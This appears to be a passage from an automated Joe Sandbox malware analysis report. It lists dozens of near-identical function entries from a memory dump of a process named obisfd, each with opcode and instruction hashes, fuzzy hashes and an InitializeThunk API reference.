                                                                                            • Instruction ID: 73e138e63ad644d8dd0781d19acb124a8a8ab1aa50ffc89d7ad2ba7321edfb79
                                                                                            • Opcode Fuzzy Hash: 055a6afef93f6cec94fd3c99832508c1e247c00c91321a1fba4d6db58442e023
                                                                                            • Instruction Fuzzy Hash: 40C1C074E01218CFDB54DFA5C994B9DBBB2BF89300F2484A9D809AB355DB359E81CF50
                                                                                            Function 006B9458 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 852f97c5df361ccecee08c7b92e9aa28b65b9f9b984222d50a4e09d59746c126
                                                                                            • Instruction ID: 2f6b71095e0babeea247a9b3d81ec030062f07f5ee8d2ae40576964cad222134
                                                                                            • Opcode Fuzzy Hash: 852f97c5df361ccecee08c7b92e9aa28b65b9f9b984222d50a4e09d59746c126
                                                                                            • Instruction Fuzzy Hash: 2DC1B074E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D409AB355DB35AE85CF50
                                                                                            Function 006B8750 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 5ce95698edd61889438d85f38089441cee4eeff25e3102cc5461a9d332e400fc
                                                                                            • Instruction ID: 131e010baec74c4e56605d6792c1f7eea083941fcb82b0b50bc3e120e4bfc810
                                                                                            • Opcode Fuzzy Hash: 5ce95698edd61889438d85f38089441cee4eeff25e3102cc5461a9d332e400fc
                                                                                            • Instruction Fuzzy Hash: 2DC1C1B4E01218CFDB54DFA5C995BADBBB2BF89300F1084A9D409AB395DB359E81CF50
                                                                                            Function 006B4628 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c967fe908480e349417645c7b701a14c8662afc4757cbeea3b04f5a0c824d6ae
                                                                                            • Instruction ID: 1aa8308463f097b9f7b21c7bb1d49aa738cc77eed699cf215c6aa4012c3d1782
                                                                                            • Opcode Fuzzy Hash: c967fe908480e349417645c7b701a14c8662afc4757cbeea3b04f5a0c824d6ae
                                                                                            • Instruction Fuzzy Hash: CDC1B174E01218CFDB54DFA5C995B9DBBB2BF89300F2084A9D409AB355DB359E81CF50
                                                                                            Function 006BCD28 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 3198e3a99f77481e2efea6806e996ce2b7919726495245ef29444df357b2fb63
                                                                                            • Instruction ID: 2cdf96c92a92eecd4c82b74c51b9215432da91bc378be6eb86fcf1fe3b70c04a
                                                                                            • Opcode Fuzzy Hash: 3198e3a99f77481e2efea6806e996ce2b7919726495245ef29444df357b2fb63
                                                                                            • Instruction Fuzzy Hash: D5C1B074E01218CFDB54DFA5C995B9DBBB2BF89300F1084A9D809AB355EB359E81CF50
                                                                                            Function 006B3920 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9b0238ce0ef2613df064788ef0611c591495162fd65041d314b178061ebe7e6c
                                                                                            • Instruction ID: a157835b2398b96d89e1736cd0ec1d015695d0cbb37e6a55a8e0a33456bc116d
                                                                                            • Opcode Fuzzy Hash: 9b0238ce0ef2613df064788ef0611c591495162fd65041d314b178061ebe7e6c
                                                                                            • Instruction Fuzzy Hash: 23C1B074E01228CFDB54DFA5C994B9DBBB2BF89300F2084A9D409AB395DB359E81CF50
                                                                                            Function 006BC020 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9456ce58ac75d32330e362eb79458c1f585582e45468e4314cf4188730e18899
                                                                                            • Instruction ID: 2d336a58cfd97804c1a99022bb407c0fdfd556800bc083a5737ef927f24c8741
                                                                                            • Opcode Fuzzy Hash: 9456ce58ac75d32330e362eb79458c1f585582e45468e4314cf4188730e18899
                                                                                            • Instruction Fuzzy Hash: B2C1B074E01218CFDB54DFA5C995BADBBB2BF89300F2084A9D809AB355DB359E81CF50
                                                                                            Function 006B6038 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: d12782e14e0fb7313e9d5fe058fd58efb7e007ef75dd9f7393b3dfde7c9fcd61
                                                                                            • Instruction ID: e554983628dc1a54acf1ee1fc0a64ff2d28222a1c8c2538e181516e0aa635517
                                                                                            • Opcode Fuzzy Hash: d12782e14e0fb7313e9d5fe058fd58efb7e007ef75dd9f7393b3dfde7c9fcd61
                                                                                            • Instruction Fuzzy Hash: 97C1C174E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9E409AB355DB359E85CF50
                                                                                            Function 006BDA30 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 95d653a3988c673f320502e5331f7a51923159a01ad1a12c7002cb8b9b1b3ee8
                                                                                            • Instruction ID: 9cd75f3690b6b1c85e5ab337a94c84e6d81fef8fa237be270c9e2cdfbe33feb0
                                                                                            • Opcode Fuzzy Hash: 95d653a3988c673f320502e5331f7a51923159a01ad1a12c7002cb8b9b1b3ee8
                                                                                            • Instruction Fuzzy Hash: 8FC1B1B4E01218CFDB54DFA5C994B9DBBB2BF89300F1084A9D409AB355EB359E85CF50
                                                                                            Function 006B5330 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8da5b0b591d8bdb72e712d64c70e5a44a937f8666f68c1d312d20043d31afb02
                                                                                            • Instruction ID: 7c49ecdde3e81ae20757a3616c92e99821a924b1223c511e26cf9f1c39a90a65
                                                                                            • Opcode Fuzzy Hash: 8da5b0b591d8bdb72e712d64c70e5a44a937f8666f68c1d312d20043d31afb02
                                                                                            • Instruction Fuzzy Hash: AAC1AE74E01218CFDB54DFA5C994BDDBBB2AF89300F2084A9D409AB395EB359A81CF50
                                                                                            Function 006B9000 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 0e8abd9d2ba065425ba1453f147fe803be69d9a5479a83a1a236c13349f63a4e
                                                                                            • Instruction ID: 4d4ffa478264ad975b30f019c78340dccc8b8ecbb1c655d49a0e5e5f387bccf6
                                                                                            • Opcode Fuzzy Hash: 0e8abd9d2ba065425ba1453f147fe803be69d9a5479a83a1a236c13349f63a4e
                                                                                            • Instruction Fuzzy Hash: CBC1BF74E01218CFDB54DFA5C995B9DBBB2BF89300F1084A9D809AB395DB359E81CF50
                                                                                            Function 006BB318 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e94ded747f396d03061e4e97caa1de64158f5cb4bb76900ddcc0e27914c4852c
                                                                                            • Instruction ID: f8ed34e39830f2ff959d129a0352c79431be97edd5bde0e7d874cb227002811b
                                                                                            • Opcode Fuzzy Hash: e94ded747f396d03061e4e97caa1de64158f5cb4bb76900ddcc0e27914c4852c
                                                                                            • Instruction Fuzzy Hash: D7C1BF74E01218CFDB54DFA5C994B9DBBB2BF89300F2484A9D809AB395DB359E81CF50
                                                                                            Function 006B5BE0 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 80c180e53c3ff0c54094f9c7fc05aa10e30b679c169cfde2eae8c6907bbfcaff
                                                                                            • Instruction ID: 2010398bb406a2f5e1cdd81383d01f1ca031a4debf0f39838e7039194abec79c
                                                                                            • Opcode Fuzzy Hash: 80c180e53c3ff0c54094f9c7fc05aa10e30b679c169cfde2eae8c6907bbfcaff
                                                                                            • Instruction Fuzzy Hash: 37C1AF74E01218CFDB54DFA5C994BADBBB2BF89300F2084A9D409AB395DB359A85CF50
                                                                                            Function 006B82F8 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: c2fb2f87d7b5905a41d5c3e83c3f171987db464cd93ef196b12e8873fc4e9f43
                                                                                            • Instruction ID: 8453ea5a8532bf55bf27fbc20303b50dde971e3d25263c8eec1b8ab5677eba83
                                                                                            • Opcode Fuzzy Hash: c2fb2f87d7b5905a41d5c3e83c3f171987db464cd93ef196b12e8873fc4e9f43
                                                                                            • Instruction Fuzzy Hash: A6C1B174E01218CFDB54DFA5C995BADBBB2BF89300F2084A9D409AB355EB359E81CF50
                                                                                            Function 006B75F0 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: cc7445652f1a03afc56a72c20356aa8298fe58ce08fe2cfc4c9d9eed5598879b
                                                                                            • Instruction ID: 4c4cfa669e965f3d8d149c19c3e81903b2d4fc4e34f6906fac8183746adf34b9
                                                                                            • Opcode Fuzzy Hash: cc7445652f1a03afc56a72c20356aa8298fe58ce08fe2cfc4c9d9eed5598879b
                                                                                            • Instruction Fuzzy Hash: 70C1C174E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D409AB355DB359E81CF50
                                                                                            Function 006BBBC8 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 6227d563054492d83783f61bf3d39b400edac6c8be570d21fca1c57edfc22d5a
                                                                                            • Instruction ID: ff19b87797a40d2bc5188124cfd217cb544e39fcd87e4e57ff20ac5dc544aa90
                                                                                            • Opcode Fuzzy Hash: 6227d563054492d83783f61bf3d39b400edac6c8be570d21fca1c57edfc22d5a
                                                                                            • Instruction Fuzzy Hash: DBC1C174E01218CFDB54DFA5C994BADBBB2BF89300F2084A9D409AB395DB359E81CF50
                                                                                            Function 006B34C8 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: a68f09df275b8a1ed9e5d8017553baf13a08054fd81acf5fb5bcc4a89dec12bc
                                                                                            • Instruction ID: c5c52adb526b6a9b5271ac8bb3d395b3552e4fecbd33d465be63d40deba4ef2e
                                                                                            • Opcode Fuzzy Hash: a68f09df275b8a1ed9e5d8017553baf13a08054fd81acf5fb5bcc4a89dec12bc
                                                                                            • Instruction Fuzzy Hash: E0C1B1B4E01228CFDB54DFA5C994B9DBBB2BF89300F1084A9D409AB355DB355E85CF50
                                                                                            Function 006BAEC0 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: cc6cb6ba15ce97de11c351639e39d2b903ce47ea4c2804978ffa82321d2ffb27
                                                                                            • Instruction ID: c54113048e57ab416188ff863e329a9915817de2554d10fb6769ffe8aa260e83
                                                                                            • Opcode Fuzzy Hash: cc6cb6ba15ce97de11c351639e39d2b903ce47ea4c2804978ffa82321d2ffb27
                                                                                            • Instruction Fuzzy Hash: F2C1B074E01218CFDB54DFA5C995BADBBB2BF89300F1084A9D809AB355DB359E81CF50
                                                                                            Function 006B4ED8 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: d45a80a2a294f6f651f2cb5f8a23b62e4cf0349b7eb38d3fd30afd526162e4d8
                                                                                            • Instruction ID: bbe6dc0405a06a0ed96447a4fe7531224f80207057d71ffd716f82b136efed4b
                                                                                            • Opcode Fuzzy Hash: d45a80a2a294f6f651f2cb5f8a23b62e4cf0349b7eb38d3fd30afd526162e4d8
                                                                                            • Instruction Fuzzy Hash: 67C1AF74E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D809AB395DB359E85CF50
                                                                                            Function 006BD5D8 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 015f05ba3e0faa81d605b0e7771d65d3cfb3a5108c22e7035db5951062973de2
                                                                                            • Instruction ID: a59427268f922ba619432dca45cea92d57de21a275ffaf375cf8e2024caaf3d3
                                                                                            • Opcode Fuzzy Hash: 015f05ba3e0faa81d605b0e7771d65d3cfb3a5108c22e7035db5951062973de2
                                                                                            • Instruction Fuzzy Hash: 98C1C174E01218CFDB54DFA5C994B9DBBB2BF89300F1484A9D409AB395EB359E81CF50
                                                                                            Function 006BC8D0 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8e37a5d3213c9d20895bdcd0e8a709e5ba7ca38fc17061abe08695062cc5e5e3
                                                                                            • Instruction ID: 1e340c46854d887942eafa8150dd18305cf6668dcf3ccfb3d9a423d00e34e4e1
                                                                                            • Opcode Fuzzy Hash: 8e37a5d3213c9d20895bdcd0e8a709e5ba7ca38fc17061abe08695062cc5e5e3
                                                                                            • Instruction Fuzzy Hash: 3AC1D1B4E01218CFDB14DFA5C995B9DBBB2BF89300F2084A9D809AB395DB355E85CF50
                                                                                            Function 006B41D0 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 276cd96d41a16d1fdb52cfe6147010ecfca9a576839d228347f59b8c08daff06
                                                                                            • Instruction ID: c8ffe83b687c406bfa3bbcbe4cb7e8b9649a33e87eca19f00c9423486f89dd9f
                                                                                            • Opcode Fuzzy Hash: 276cd96d41a16d1fdb52cfe6147010ecfca9a576839d228347f59b8c08daff06
                                                                                            • Instruction Fuzzy Hash: E1C1B074E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D409AB395DB359E81CF50
                                                                                            Function 006B8BA8 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 115803cf1de5dbe179a28ea4a919b5878afee84687a06e87f92588543dfd50b7
                                                                                            • Instruction ID: ff23ad54a086f81cd70c5ad32330d21dfda5459b3a8dc098fe031e38360e438e
                                                                                            • Opcode Fuzzy Hash: 115803cf1de5dbe179a28ea4a919b5878afee84687a06e87f92588543dfd50b7
                                                                                            • Instruction Fuzzy Hash: 8CC1C1B4E01218CFDB54DFA5C994BADBBB2BF89300F1084A9D409AB395DB359E81CF50
                                                                                            Function 006B7EA0 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 1f2313aa676de2744856291490915e6c127c584a15a9eb0c535dede335b2cbdb
                                                                                            • Instruction ID: f506404804115edd987da32de37815212fd52f09a909571ebc6efeda0e13c5f5
                                                                                            • Opcode Fuzzy Hash: 1f2313aa676de2744856291490915e6c127c584a15a9eb0c535dede335b2cbdb
                                                                                            • Instruction Fuzzy Hash: 2CC1C074E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D809AB355DB359E85CF50
                                                                                            Function 006B98B0 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 3bdd1bf77ef522ccffdf795eb40639f60427f6931776c7e73cdfbc3b2fbb6253
                                                                                            • Instruction ID: 90c217a5fc44e69bd6281d982a9bc1633c6f39e65287f64525bddd91fe3ab77f
                                                                                            • Opcode Fuzzy Hash: 3bdd1bf77ef522ccffdf795eb40639f60427f6931776c7e73cdfbc3b2fbb6253
                                                                                            • Instruction Fuzzy Hash: B7C1C174E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D409AB395DB359E81CF50
                                                                                            Function 006B5788 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: b8ab7df607c23b2f2403ab8dd27e1734cbe5e6d53cae314f4e89c7fc2208c1d1
                                                                                            • Instruction ID: 87af94e26f5c9599270814dbba4e0660fbeac5abed17189da790ea0182b99efa
                                                                                            • Opcode Fuzzy Hash: b8ab7df607c23b2f2403ab8dd27e1734cbe5e6d53cae314f4e89c7fc2208c1d1
                                                                                            • Instruction Fuzzy Hash: A4C1AE74E01218CFDB54DFA5C994B9DBBB2AF89300F2084A9D809AB395DB359A81CF50
                                                                                            Function 006BD180 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 0e2c608627684a5f01bcf02a39b7a141bd0ccfaf0f4e40db2ef7806bd0dfd1d4
                                                                                            • Instruction ID: a1d3d3a4b30b0215675bbd2a0f5df3f622a08560f8cea20d23b492350a35bb72
                                                                                            • Opcode Fuzzy Hash: 0e2c608627684a5f01bcf02a39b7a141bd0ccfaf0f4e40db2ef7806bd0dfd1d4
                                                                                            • Instruction Fuzzy Hash: F1C1B1B4E01218CFDB54DFA5C994B9DBBB2BF89300F2484A9D409AB355EB359E81CF50
                                                                                            Function 006B4A80 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 87ed4ad545b7efff018629c36d6d5c6b476a4cf38eb3fd1cfef610ca2dc506f2
                                                                                            • Instruction ID: 0511222a146484b13449576d3e326faf72eb4c86e1846d14ddd8b1ca3a391263
                                                                                            • Opcode Fuzzy Hash: 87ed4ad545b7efff018629c36d6d5c6b476a4cf38eb3fd1cfef610ca2dc506f2
                                                                                            • Instruction Fuzzy Hash: 07C1B074E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D409AB355DB35AE81CF50
                                                                                            Function 006B7198 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 2d0d550cda0d60f05f5a5b9c1ba1f61a7625e0058908bc8894f57fe969e05eb8
                                                                                            • Instruction ID: c5fcc97c7011eca9208f2525b9ec151f137a3bb9783c6d97bd17bcf97bf9830b
                                                                                            • Opcode Fuzzy Hash: 2d0d550cda0d60f05f5a5b9c1ba1f61a7625e0058908bc8894f57fe969e05eb8
                                                                                            • Instruction Fuzzy Hash: 48C1D174E01218CFDB54DFA5C994B9DBBB2BF89300F2084A9D409AB355DB35AE81CF50
                                                                                            Function 006B6490 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 3874072248884c4060c3d5b4c8de446803fe351432bfa6a2dbb16b8bd288ffbd
                                                                                            • Instruction ID: 2c90c89e977b3dde4bb8f21d4de57b1e9f2c35ab6df645c589b8f79a5d111bb2
                                                                                            • Opcode Fuzzy Hash: 3874072248884c4060c3d5b4c8de446803fe351432bfa6a2dbb16b8bd288ffbd
